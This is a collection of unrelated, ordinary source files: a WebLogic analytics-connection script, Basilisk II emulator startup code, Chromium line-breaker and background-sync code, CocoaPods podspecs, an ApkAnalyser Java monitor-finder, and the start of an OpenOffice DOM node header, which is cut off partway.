#!/usr/bin/python # Copyright (c) 2021, Oracle and/or its affiliates. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl. import sys #============================================================ #Connect To AdminServer and create Analytics Connection #============================================================ adminHost = os.environ.get("ADMIN_SERVER_CONTAINER_NAME") adminPort = os.environ.get("ADMIN_PORT") adminName = os.environ.get("ADMIN_USERNAME") adminPassword = <PASSWORD>("ADMIN_PASSWORD") url = adminHost + ":" + adminPort connect(adminName, adminPassword, url) createAnalyticsCollectorConnection(appName='webcenter', connectionName='MyAnalyticsCollector', isUnicast=1, collectorHost='localhost', collectorPort=31314, isEnabled=1, timeout=30, default=1)
240
940
<filename>BasiliskII/src/main.cpp /* * main.cpp - Startup/shutdown code * * Basilisk II (C) 1997-2008 <NAME> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include "sysdeps.h" #include "cpu_emulation.h" #include "xpram.h" #include "timer.h" #include "sony.h" #include "disk.h" #include "cdrom.h" #include "scsi.h" #include "extfs.h" #include "audio.h" #include "video.h" #include "serial.h" #include "ether.h" #include "clip.h" #include "adb.h" #include "rom_patches.h" #include "user_strings.h" #include "prefs.h" #include "main.h" #define DEBUG 0 #include "debug.h" #if ENABLE_MON #include "mon.h" static uint32 mon_read_byte_b2(uintptr adr) { return ReadMacInt8(adr); } static void mon_write_byte_b2(uintptr adr, uint32 b) { WriteMacInt8(adr, b); } #endif /* * Initialize everything, returns false on error */ bool InitAll(const char *vmdir) { // Check ROM version if (!CheckROM()) { ErrorAlert(STR_UNSUPPORTED_ROM_TYPE_ERR); return false; } #if EMULATED_68K // Set CPU and FPU type (UAE emulation) switch (ROMVersion) { case ROM_VERSION_64K: case ROM_VERSION_PLUS: case ROM_VERSION_CLASSIC: CPUType = 0; FPUType = 0; TwentyFourBitAddressing = true; break; case ROM_VERSION_II: CPUType = PrefsFindInt32("cpu"); if (CPUType < 2) CPUType = 2; if (CPUType > 4) CPUType = 4; FPUType = PrefsFindBool("fpu") ? 
1 : 0; if (CPUType == 4) FPUType = 1; // 68040 always with FPU TwentyFourBitAddressing = true; break; case ROM_VERSION_32: CPUType = PrefsFindInt32("cpu"); if (CPUType < 2) CPUType = 2; if (CPUType > 4) CPUType = 4; FPUType = PrefsFindBool("fpu") ? 1 : 0; if (CPUType == 4) FPUType = 1; // 68040 always with FPU TwentyFourBitAddressing = false; break; } CPUIs68060 = false; #endif // Load XPRAM XPRAMInit(vmdir); // Load XPRAM default values if signature not found if (XPRAM[0x0c] != 0x4e || XPRAM[0x0d] != 0x75 || XPRAM[0x0e] != 0x4d || XPRAM[0x0f] != 0x63) { D(bug("Loading XPRAM default values\n")); memset(XPRAM, 0, 0x100); XPRAM[0x0c] = 0x4e; // "NuMc" signature XPRAM[0x0d] = 0x75; XPRAM[0x0e] = 0x4d; XPRAM[0x0f] = 0x63; XPRAM[0x01] = 0x80; // InternalWaitFlags = DynWait (don't wait for SCSI devices upon bootup) XPRAM[0x10] = 0xa8; // Standard PRAM values XPRAM[0x11] = 0x00; XPRAM[0x12] = 0x00; XPRAM[0x13] = 0x22; XPRAM[0x14] = 0xcc; XPRAM[0x15] = 0x0a; XPRAM[0x16] = 0xcc; XPRAM[0x17] = 0x0a; XPRAM[0x1c] = 0x00; XPRAM[0x1d] = 0x02; XPRAM[0x1e] = 0x63; XPRAM[0x1f] = 0x00; XPRAM[0x08] = 0x13; XPRAM[0x09] = 0x88; XPRAM[0x0a] = 0x00; XPRAM[0x0b] = 0xcc; XPRAM[0x76] = 0x00; // OSDefault = MacOS XPRAM[0x77] = 0x01; } // Set boot volume int16 i16 = PrefsFindInt32("bootdrive"); XPRAM[0x78] = i16 >> 8; XPRAM[0x79] = i16 & 0xff; i16 = PrefsFindInt32("bootdriver"); XPRAM[0x7a] = i16 >> 8; XPRAM[0x7b] = i16 & 0xff; // Init drivers SonyInit(); DiskInit(); CDROMInit(); SCSIInit(); #if SUPPORTS_EXTFS // Init external file system ExtFSInit(); #endif // Init serial ports SerialInit(); // Init network EtherInit(); // Init Time Manager TimerInit(); // Init clipboard ClipInit(); // Init ADB ADBInit(); // Init audio AudioInit(); // Init video if (!VideoInit(ROMVersion == ROM_VERSION_64K || ROMVersion == ROM_VERSION_PLUS || ROMVersion == ROM_VERSION_CLASSIC)) return false; // Set default video mode in XPRAM XPRAM[0x56] = 0x42; // 'B' XPRAM[0x57] = 0x32; // '2' const monitor_desc 
&main_monitor = *VideoMonitors[0]; XPRAM[0x58] = uint8(main_monitor.depth_to_apple_mode(main_monitor.get_current_mode().depth)); XPRAM[0x59] = 0; #if EMULATED_68K // Init 680x0 emulation (this also activates the memory system which is needed for PatchROM()) if (!Init680x0()) return false; #endif // Install ROM patches if (!PatchROM()) { ErrorAlert(STR_UNSUPPORTED_ROM_TYPE_ERR); return false; } #if ENABLE_MON // Initialize mon mon_init(); mon_read_byte = mon_read_byte_b2; mon_write_byte = mon_write_byte_b2; #endif return true; } /* * Deinitialize everything */ void ExitAll(void) { #if ENABLE_MON // Deinitialize mon mon_exit(); #endif // Save XPRAM XPRAMExit(); // Exit video VideoExit(); // Exit audio AudioExit(); // Exit ADB ADBExit(); // Exit clipboard ClipExit(); // Exit Time Manager TimerExit(); // Exit serial ports SerialExit(); // Exit network EtherExit(); #if SUPPORTS_EXTFS // Exit external file system ExtFSExit(); #endif // Exit drivers SCSIExit(); CDROMExit(); DiskExit(); SonyExit(); } /* * Display error/warning alert given the message string ID */ void ErrorAlert(int string_id) { ErrorAlert(GetString(string_id)); } void WarningAlert(int string_id) { WarningAlert(GetString(string_id)); }
2,329
370
<reponame>luoyongheng/dtslam<filename>3rdparty/suitesparse-metis-for-windows-1.2.1/SuiteSparse/COLAMD/SourceWrappers/colamd.c #include <../Source/colamd.c>
66
2,151
<filename>third_party/blink/renderer/platform/fonts/shaping/shaping_line_breaker.h<gh_stars>1000+ // Copyright 2017 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_PLATFORM_FONTS_SHAPING_SHAPING_LINE_BREAKER_H_ #define THIRD_PARTY_BLINK_RENDERER_PLATFORM_FONTS_SHAPING_SHAPING_LINE_BREAKER_H_ #include "third_party/blink/renderer/platform/layout_unit.h" #include "third_party/blink/renderer/platform/platform_export.h" #include "third_party/blink/renderer/platform/text/text_direction.h" #include "third_party/blink/renderer/platform/wtf/text/atomic_string.h" namespace blink { class Font; class ShapeResult; class HarfBuzzShaper; class Hyphenation; class LazyLineBreakIterator; enum class LineBreakType; template <typename TextContainerType> class ShapeResultSpacing; // Shapes a line of text by finding the ideal break position as indicated by the // available space and the shape results for the entire paragraph. Once an ideal // break position has been found the text is scanned backwards until a valid and // and appropriate break opportunity is identified. Unless the break opportunity // is at a safe-to-break boundary (as identified by HarfBuzz) the beginning and/ // or end of the line is reshaped to account for differences caused by breaking. // // This allows for significantly faster and more efficient line breaking by only // reshaping when absolutely necessarily and by only evaluating likely candidate // break opportunities instead of measuring and evaluating all possible options. class PLATFORM_EXPORT ShapingLineBreaker final { STACK_ALLOCATED(); public: ShapingLineBreaker(const HarfBuzzShaper*, const Font*, const ShapeResult*, const LazyLineBreakIterator*, ShapeResultSpacing<String>* = nullptr, const Hyphenation* = nullptr); ~ShapingLineBreaker() = default; // Represents details of the result of |ShapeLine()|. 
struct Result { STACK_ALLOCATED(); // Indicates the resulting break offset. unsigned break_offset; // True if the break is hyphenated, either by automatic hyphenation or // soft-hyphen characters. // The hyphen glyph is not included in the |ShapeResult|, and that appending // a hyphen glyph may overflow the specified available space. bool is_hyphenated; }; // Shapes a line of text by finding a valid and appropriate break opportunity // based on the shaping results for the entire paragraph. // |start_should_be_safe| is true for the beginning of each wrapped line, but // is false for subsequent ShapeResults. scoped_refptr<ShapeResult> ShapeLine(unsigned start_offset, LayoutUnit available_space, bool start_should_be_safe, Result* result_out); scoped_refptr<ShapeResult> ShapeLine(unsigned start_offset, LayoutUnit available_space, Result* result_out) { return ShapeLine(start_offset, available_space, true, result_out); } // Disable breaking at soft hyphens (U+00AD). bool IsSoftHyphenEnabled() const { return is_soft_hyphen_enabled_; } void DisableSoftHyphen() { is_soft_hyphen_enabled_ = false; } private: const String& GetText() const; unsigned PreviousBreakOpportunity(unsigned offset, unsigned start, bool* is_hyphenated) const; unsigned NextBreakOpportunity(unsigned offset, unsigned start, bool* is_hyphenated) const; unsigned Hyphenate(unsigned offset, unsigned start, bool backwards, bool* is_hyphenated) const; unsigned Hyphenate(unsigned offset, unsigned word_start, unsigned word_end, bool backwards) const; scoped_refptr<ShapeResult> Shape(TextDirection, unsigned start, unsigned end); scoped_refptr<ShapeResult> ShapeToEnd(unsigned start, unsigned first_safe, unsigned range_end); const HarfBuzzShaper* shaper_; const Font* font_; const ShapeResult* result_; const LazyLineBreakIterator* break_iterator_; // TODO(kojii): ShapeResultSpacing is not const because it's stateful when it // has expansions. Split spacing and expansions to make this const. 
ShapeResultSpacing<String>* spacing_; const Hyphenation* hyphenation_; bool is_soft_hyphen_enabled_; friend class ShapingLineBreakerTest; }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_PLATFORM_FONTS_SHAPING_SHAPING_LINE_BREAKER_H_
1,907
575
<filename>content/browser/background_sync/background_sync_registration_helper.cc // Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "content/browser/background_sync/background_sync_registration_helper.h" #include "base/memory/weak_ptr.h" #include "content/browser/background_sync/background_sync_context_impl.h" #include "content/browser/background_sync/background_sync_manager.h" #include "content/browser/background_sync/background_sync_status.h" #include "content/public/browser/browser_thread.h" namespace content { BackgroundSyncRegistrationHelper::BackgroundSyncRegistrationHelper( BackgroundSyncContextImpl* background_sync_context) : background_sync_context_(background_sync_context) { DCHECK(background_sync_context_); } BackgroundSyncRegistrationHelper::~BackgroundSyncRegistrationHelper() = default; void BackgroundSyncRegistrationHelper::Register( blink::mojom::SyncRegistrationOptionsPtr options, int64_t sw_registration_id, RegisterCallback callback) { DCHECK_CURRENTLY_ON(ServiceWorkerContext::GetCoreThreadId()); BackgroundSyncManager* background_sync_manager = background_sync_context_->background_sync_manager(); DCHECK(background_sync_manager); background_sync_manager->Register( sw_registration_id, *options, base::BindOnce(&BackgroundSyncRegistrationHelper::OnRegisterResult, weak_ptr_factory_.GetWeakPtr(), std::move(callback))); } void BackgroundSyncRegistrationHelper::DidResolveRegistration( blink::mojom::BackgroundSyncRegistrationInfoPtr registration_info) { DCHECK_CURRENTLY_ON(ServiceWorkerContext::GetCoreThreadId()); BackgroundSyncManager* background_sync_manager = background_sync_context_->background_sync_manager(); DCHECK(background_sync_manager); background_sync_manager->DidResolveRegistration(std::move(registration_info)); } void BackgroundSyncRegistrationHelper::OnRegisterResult( RegisterCallback callback, BackgroundSyncStatus status, 
std::unique_ptr<BackgroundSyncRegistration> result) { DCHECK_CURRENTLY_ON(ServiceWorkerContext::GetCoreThreadId()); // TODO(crbug.com/932591): Use blink::mojom::BackgroundSyncError // directly. if (status != BACKGROUND_SYNC_STATUS_OK) { std::move(callback).Run( static_cast<blink::mojom::BackgroundSyncError>(status), /* options= */ nullptr); return; } DCHECK(result); std::move(callback).Run( static_cast<blink::mojom::BackgroundSyncError>(status), result->options()->Clone()); } void BackgroundSyncRegistrationHelper::NotifyInvalidOptionsProvided( RegisterCallback callback) const { mojo::ReportBadMessage( "BackgroundSyncRegistrationHelper: Invalid options passed."); std::move(callback).Run(blink::mojom::BackgroundSyncError::NOT_ALLOWED, /* options= */ nullptr); } void BackgroundSyncRegistrationHelper::OnGetRegistrationsResult( GetRegistrationsCallback callback, BackgroundSyncStatus status, std::vector<std::unique_ptr<BackgroundSyncRegistration>> result_registrations) { DCHECK_CURRENTLY_ON(ServiceWorkerContext::GetCoreThreadId()); std::vector<blink::mojom::SyncRegistrationOptionsPtr> mojo_registrations; mojo_registrations.reserve(result_registrations.size()); for (const auto& registration : result_registrations) mojo_registrations.push_back(registration->options()->Clone()); std::move(callback).Run( static_cast<blink::mojom::BackgroundSyncError>(status), std::move(mojo_registrations)); } base::WeakPtr<BackgroundSyncRegistrationHelper> BackgroundSyncRegistrationHelper::GetWeakPtr() { return weak_ptr_factory_.GetWeakPtr(); } } // namespace content
1,199
6,989
#ifdef USE_PYTHON3 #include <contrib/python/numpy/py3/numpy/f2py/src/fortranobject.h> #else #include <contrib/python/numpy/py2/numpy/f2py/src/fortranobject.h> #endif
77
5,169
<gh_stars>1000+ { "name": "GMJKFunction", "version": "0.6.0", "summary": "国民集团 独立功能集成", "description": "TODO: Add long description of the pod here.", "homepage": "http://119.3.60.230/IOS", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "满聪": "<EMAIL>" }, "source": { "git": "http://172.16.17.3230/IOS/GMJKFunction.git", "tag": "0.6.0" }, "platforms": { "ios": "8.0" }, "swift_versions": "5.0", "dependencies": { "SnapKit": [ ], "GMJKExtension": [ ] }, "subspecs": [ { "name": "AppStore", "source_files": "GMJKFunction/Classes/AppStore/*.swift" }, { "name": "JKRoute", "source_files": "GMJKFunction/Classes/JKRoute/*.swift" }, { "name": "JKScanViewController", "source_files": "GMJKFunction/Classes/JKScanViewController/*.swift", "dependencies": { "GMJKFunction/JKRoute": [ ] }, "ios": { "resource_bundles": { "JKScanBundle": "GMJKFunction/Assets/Scan/**/*.png" } } }, { "name": "JKTool", "source_files": "GMJKFunction/Classes/JKTool/*.swift" }, { "name": "JKToast", "source_files": "GMJKFunction/Classes/JKToast/*.swift", "ios": { "resource_bundles": { "JKToastBundle": "GMJKFunction/Assets/Toast/**/*.png" } } }, { "name": "JKTimer", "source_files": "GMJKFunction/Classes/JKTimer/*.swift" }, { "name": "JKPickerView", "source_files": "GMJKFunction/Classes/JKPickerView/*.swift", "ios": { "resource_bundles": { "JKPickerViewBundle": "GMJKFunction/Assets/PickerView/**/*" } } }, { "name": "JKPickerImageHelper", "source_files": "GMJKFunction/Classes/PickerImageHelper/**/*", "ios": { "resource_bundles": { "JKPhotoLibraryBundle": "GMJKFunction/Assets/JKPickerImageHelper/**/*.png" } } } ], "swift_version": "5.0" }
1,087
335
{ "word": "Ministerial", "definitions": [ "Relating to a government minister or ministers.", "Relating to a minister of religion.", "Relating to or entrusted with the execution of the law or the commands of a superior." ], "parts-of-speech": "Adjective" }
107
721
/* * Copyright (C) 2012 Sony Mobile Communications AB * * This file is part of ApkAnalyser. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package analyser.gui.actions.lookup; import gui.actions.AbstractCanceableAction; import java.awt.event.ActionEvent; import java.io.IOException; import java.util.ArrayList; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Set; import java.util.Stack; import javax.swing.Icon; import mereflect.CollaborateClassContext; import mereflect.CorruptBytecodeException; import mereflect.MEClass; import mereflect.MEClassContext; import mereflect.MEMethod; import org.jf.dexlib.Code.Instruction; import org.jf.dexlib.Code.Opcode; import analyser.gui.LineBuilder; import analyser.gui.MainFrame; import analyser.gui.Selection; import analyser.logic.RefMethod; import analyser.logic.Reference; import andreflect.ApkClassContext; import andreflect.DexMethod; public class FindMonitorsAction extends AbstractCanceableAction { private static final long serialVersionUID = 8382352528921219013L; protected static FindMonitorsAction m_inst = null; protected List<ArrayList<StackEntry>> m_result; protected int m_totalInvoks; protected int m_traversedInvoks = 0; public static FindMonitorsAction getInstance(MainFrame mainFrame) { if (m_inst == null) { m_inst = new FindMonitorsAction("Find monitor calls", null); m_inst.setMainFrame(mainFrame); } return m_inst; } protected FindMonitorsAction(String arg0, Icon arg1) { super(arg0, arg1); 
} @Override public void run(ActionEvent e) throws Throwable { m_result = new ArrayList<ArrayList<StackEntry>>(); Object ref = Selection.getSelectedObject(); if (!(ref instanceof Reference)) { return; } CollaborateClassContext ctx = MainFrame.getInstance().getResolver().getReferenceContext(); m_totalInvoks = ((Reference) ref).getCount() + 1; m_traversedInvoks = 0; traverse(ctx, new HashSet<MEMethod>(), new Stack<StackEntry>(), (Reference) ref); if (isRunning()) { getMainFrame().actionFinished(this); showResult(); } } protected void traverse(MEClassContext ctx, Set<MEMethod> resolved, Stack<StackEntry> callStack, Reference ref) throws Throwable { if (!isRunning()) { return; } if (ref instanceof RefMethod) { m_traversedInvoks += ((RefMethod) ref).getCount(); getMainFrame().actionReportWork(this, 100 * m_traversedInvoks / m_totalInvoks); MEMethod mMethod = ((RefMethod) ref).getMethod(); recurseInvokations(ctx, resolved, callStack, mMethod); } else { Iterator<Reference> i = ref.getChildren().iterator(); while (i.hasNext()) { traverse(ctx, resolved, callStack, i.next()); } } } protected void recurseInvokations(MEClassContext ctx, Set<MEMethod> resolved, Stack<StackEntry> callStack, MEMethod mMethod) throws IOException { if (resolved.contains(mMethod) || !isRunning()) { return; } resolved.add(mMethod); callStack.push(new StackEntry(mMethod)); List<MEMethod.Invokation> invokations = null; Iterator<MEMethod.Invokation> iI = null; if (mMethod.getMEClass().getResource().getContext().isMidlet()) { if (mMethod.getMEClass().getResource().getContext().getContextDescription().equals(ApkClassContext.DESCRIPTION)) { DexMethod method = (DexMethod) mMethod; if ((method.getEncodedMethod().codeItem != null && method.getEncodedMethod().codeItem.getInstructions().length != 0)) { Instruction[] instructions = method.getEncodedMethod().codeItem.getInstructions(); for (int i = 0; i < instructions.length; i++) { Instruction instruction = instructions[i]; Opcode code = 
instruction.deodexedInstruction.opcode; if (code == Opcode.MONITOR_ENTER) { reportMonitor(new StackEntry(mMethod, instruction.codeAddress), callStack); //System.out.println("[FindMonitorsAction] Found DexMonitor in "+ mMethod.getDescriptor()); } } } } else { try { List<Integer> monitors = mMethod.getBytecode(194); // monitor enter for (int i = 0; i < monitors.size(); i++) { reportMonitor(new StackEntry(mMethod, (monitors.get(i)).intValue()), callStack); } } catch (CorruptBytecodeException cbe) { } } } try { invokations = mMethod.getInvokations(); iI = invokations.iterator(); } catch (CorruptBytecodeException cbe) { } while (isRunning() && iI != null && iI.hasNext()) { MEMethod.Invokation invok = iI.next(); try { MEClass rClass = ctx.getMEClass(invok.invClassname); MEMethod rMethod = rClass.getMethod(invok.invMethodname, invok.invDescriptor); if (rMethod == null) { throw new ClassNotFoundException("Method " + invok.invMethodname + ":" + invok.invDescriptor + " not found in class " + rClass.getName()); } if (rMethod.isSynchronized()) { reportMonitor(new StackEntry(rMethod), callStack); } if (rClass.getResource().getContext().isMidlet()) { recurseInvokations(ctx, resolved, callStack, rMethod); } } catch (ClassNotFoundException e2) { } } callStack.pop(); } protected void reportMonitor(StackEntry call, Stack<StackEntry> callStack) { StackEntry tmp = null; if (call.pcOffset >= 0) { // replace last entry in stack tmp = callStack.pop(); } callStack.push(call); m_result.add(new ArrayList<StackEntry>(callStack)); callStack.pop(); if (call.pcOffset >= 0) { callStack.push(tmp); } } protected void showResult() { LineBuilder lb = new LineBuilder(); lb.newLine(); if (m_result.size() > 0) { for (int i = 0; i < m_result.size(); i++) { ArrayList<StackEntry> stack = m_result.get(i); for (int j = 0; j < stack.size(); j++) { StackEntry te = stack.get(j); lb.append(te.method.getMEClass().getName(), 0x000088); lb.append(':', 0x000000); lb.append(te.method.getFormattedName() + 
te.method.getDescriptor().replace('/', '.'), 0x008888); if (te.pcOffset >= 0) { lb.append(te.method.getFormattedName() + te.method.getDescriptor().replace('/', '.'), 0x008888); lb.append(" monitorenter @ " + Integer.toHexString(te.pcOffset), 0x880000); } lb.newLine(); } lb.newLine(); } getMainFrame().showText("Monitors search result", lb); getMainFrame().initBottomInfo(); } else { getMainFrame().setBottomInfo("No monitors found"); } } @Override public void handleThrowable(Throwable t) { t.printStackTrace(); getMainFrame().showError("Error resolving monitors", t); } @Override public String getWorkDescription() { return "Resolving monitors"; } class StackEntry { MEMethod method; int pcOffset = -1; public StackEntry(MEMethod m) { method = m; pcOffset = -1; } public StackEntry(MEMethod m, int offset) { method = m; pcOffset = offset; } } }
3,930
416
<filename>webkit/Page.py from .wkutils import Command def reload(): command = Command('Page.reload', {}) return command
42
5,169
<gh_stars>1000+ { "name": "BaiduMapKit", "version": "6.2.0", "summary": "百度地图iOS SDK(CocoaPods百度地图官方库)", "description": "百度地图iOS SDK:百度地图官方CocoaPods.\n百度地图iOS SDK是一套基于iOS 8.0及以上版本设备的应用程序接口,不仅提供展示地图的基本接口,还提供POI检索、路径规划、地图标注、离线地图、步骑行导航等丰富的LBS能力。", "homepage": "http://developer.baidu.com/map/index.php?title=iossdk", "license": { "type": "Copyright", "text": "Copyright (c) 2015 BaiduLBS" }, "authors": { "baidu map sdk": "<EMAIL>" }, "platforms": { "ios": "8.0" }, "source": { "http": "https://lbsyun-baidu.cdn.bcebos.com/iossdk/map/6.2.0/BaiduMapKitV6.2.0.zip" }, "requires_arc": true, "static_framework": true, "frameworks": [ "CoreGraphics", "CoreLocation", "OpenGLES", "QuartzCore", "Security", "SystemConfiguration", "Accelerate" ], "libraries": [ "sqlite3.0", "c++", "z" ], "user_target_xcconfig": { "OTHER_LDFLAGS": [ "-ObjC", "-w" ] }, "default_subspecs": [ "Base", "Map", "Search", "Cloud", "Utils" ], "subspecs": [ { "name": "Base", "ios": { "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Base.framework", "vendored_libraries": "BaiduMapKit/thirdlibs/*.{a}", "source_files": "BaiduMapKit/BaiduMapAPI_Base.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Base.framework/Headers/*.h" } }, { "name": "Map", "ios": { "dependencies": { "BaiduMapKit/Base": [ ] }, "resources": "BaiduMapKit/BaiduMapAPI_Map.framework/*.bundle", "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Map.framework", "source_files": "BaiduMapKit/BaiduMapAPI_Map.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Map.framework/Headers/*.h" } }, { "name": "Search", "ios": { "dependencies": { "BaiduMapKit/Base": [ ] }, "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Search.framework", "source_files": "BaiduMapKit/BaiduMapAPI_Search.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Search.framework/Headers/*.h" } }, { "name": "Cloud", "ios": { "dependencies": { "BaiduMapKit/Base": [ ] }, "vendored_frameworks": 
"BaiduMapKit/BaiduMapAPI_Cloud.framework", "source_files": "BaiduMapKit/BaiduMapAPI_Cloud.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Cloud.framework/Headers/*.h" } }, { "name": "Utils", "ios": { "dependencies": { "BaiduMapKit/Base": [ ] }, "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Utils.framework", "source_files": "BaiduMapKit/BaiduMapAPI_Utils.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Utils.framework/Headers/*.h" } } ] }
1,702
3,477
// Copyright Microsoft and Project Verona Contributors. // SPDX-License-Identifier: MIT #include "process_sandbox/platform/platform.h" using namespace sandbox::platform; int main(void) { auto sp = SocketPair::create(); int i = 42; SANDBOX_INVARIANT( write(sp.first.fd, &i, sizeof(i)) == sizeof(i), "Write failed"); SANDBOX_INVARIANT( read(sp.second.fd, &i, sizeof(i)) == sizeof(i), "Read failed"); SANDBOX_INVARIANT(i == 42, "Received value {} != 42", i); i = 0x12345678; SANDBOX_INVARIANT( write(sp.second.fd, &i, sizeof(i)) == sizeof(i), "Write failed"); SANDBOX_INVARIANT( read(sp.first.fd, &i, sizeof(i)) == sizeof(i), "Read failed"); SANDBOX_INVARIANT(i == 0x12345678, "i is {:x}, 0x12345678 expected", i); }
299
455
<filename>ios/Classes/CompressListHandler.h // // CompressListHandler.h // flutter_image_compress // // Created by cjl on 2018/9/8. // #import <Foundation/Foundation.h> @interface CompressListHandler : NSObject - (void)handleMethodCall:(FlutterMethodCall *)call result:(FlutterResult)result; @end
105
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef DOM_NODE_HXX #define DOM_NODE_HXX #include <hash_map> #include <libxml/tree.h> #include <sal/types.h> #include <rtl/ref.hxx> #include <rtl/string.hxx> #include <rtl/ustring.hxx> #include <cppuhelper/implbase3.hxx> #include <sax/fastattribs.hxx> #include <com/sun/star/uno/Reference.h> #include <com/sun/star/uno/Sequence.h> #include <com/sun/star/lang/XUnoTunnel.hpp> #include <com/sun/star/xml/dom/XNode.hpp> #include <com/sun/star/xml/dom/XNodeList.hpp> #include <com/sun/star/xml/dom/XNamedNodeMap.hpp> #include <com/sun/star/xml/dom/NodeType.hpp> #include <com/sun/star/xml/dom/events/XEventTarget.hpp> #include <com/sun/star/xml/dom/events/XEvent.hpp> #include <com/sun/star/xml/dom/DOMException.hpp> #include <com/sun/star/xml/sax/XDocumentHandler.hpp> #include <com/sun/star/xml/sax/XFastDocumentHandler.hpp> using ::rtl::OUString; using ::rtl::OString; using namespace sax_fastparser; using namespace com::sun::star::uno; using namespace com::sun::star::xml::sax; using namespace com::sun::star::xml::dom; using namespace com::sun::star::xml::dom::events; using 
com::sun::star::lang::XUnoTunnel; namespace DOM { struct Context { Context( const Reference< XFastDocumentHandler >& i_xHandler, const Reference< XFastTokenHandler >& i_xTokenHandler ) : maNamespaces( 1, std::vector<Namespace>() ), maNamespaceMap(101), mxAttribList(new FastAttributeList(i_xTokenHandler)), mxCurrentHandler(i_xHandler, UNO_QUERY_THROW), mxDocHandler(i_xHandler), mxTokenHandler(i_xTokenHandler) {} struct Namespace { OString maPrefix; sal_Int32 mnToken; OUString maNamespaceURL; const OString& getPrefix() const { return maPrefix; } }; typedef std::vector< std::vector<Namespace> > NamespaceVectorType; typedef std::hash_map< OUString, sal_Int32, rtl::OUStringHash > NamespaceMapType; /// outer vector: xml context; inner vector: current NS NamespaceVectorType maNamespaces; NamespaceMapType maNamespaceMap; ::rtl::Reference<FastAttributeList> mxAttribList; Reference<XFastContextHandler> mxCurrentHandler; Reference<XFastDocumentHandler> mxDocHandler; Reference<XFastTokenHandler> mxTokenHandler; }; void pushContext(Context& io_rContext); void popContext(Context& io_rContext); sal_Int32 getTokenWithPrefix( const Context& rContext, const sal_Char* xPrefix, const sal_Char* xName ); sal_Int32 getToken( const Context& rContext, const sal_Char* xName ); /// add namespaces on this node to context void addNamespaces(Context& io_rContext, xmlNodePtr pNode); class CDocument; class CNode : public cppu::WeakImplHelper3< XNode, XUnoTunnel, XEventTarget > { friend class CDocument; friend class CElement; friend class CAttributesMap; private: bool m_bUnlinked; /// node has been removed from document protected: NodeType const m_aNodeType; /// libxml node; NB: not const, because invalidate may reset it to 0! 
xmlNodePtr m_aNodePtr; ::rtl::Reference< CDocument > const m_xDocument; ::osl::Mutex & m_rMutex; // for initialization by classes derived through ImplInheritanceHelper CNode(CDocument const& rDocument, ::osl::Mutex const& rMutex, NodeType const& reNodeType, xmlNodePtr const& rpNode); void invalidate(); void dispatchSubtreeModified(); public: virtual ~CNode(); static CNode * GetImplementation(::com::sun::star::uno::Reference< ::com::sun::star::uno::XInterface> const& xNode); xmlNodePtr GetNodePtr() { return m_aNodePtr; } virtual CDocument & GetOwnerDocument(); // recursively create SAX events virtual void saxify(const Reference< XDocumentHandler >& i_xHandler); // recursively create SAX events virtual void fastSaxify( Context& io_rContext ); // constrains child relationship between nodes based on type virtual bool IsChildTypeAllowed(NodeType const nodeType); // ---- DOM interfaces /** Adds the node newChild to the end of the list of children of this node. */ virtual Reference< XNode > SAL_CALL appendChild(Reference< XNode > const& xNewChild) throw (RuntimeException, DOMException); /** Returns a duplicate of this node, i.e., serves as a generic copy constructor for nodes. */ virtual Reference< XNode > SAL_CALL cloneNode(sal_Bool deep) throw (RuntimeException); /** A NamedNodeMap containing the attributes of this node (if it is an Element) or null otherwise. */ virtual Reference< XNamedNodeMap > SAL_CALL getAttributes() throw (RuntimeException); /** A NodeList that contains all children of this node. */ virtual Reference< XNodeList > SAL_CALL getChildNodes() throw (RuntimeException); /** The first child of this node. */ virtual Reference< XNode > SAL_CALL getFirstChild() throw (RuntimeException); /** The last child of this node. */ virtual Reference< XNode > SAL_CALL getLastChild() throw (RuntimeException); /** Returns the local part of the qualified name of this node. 
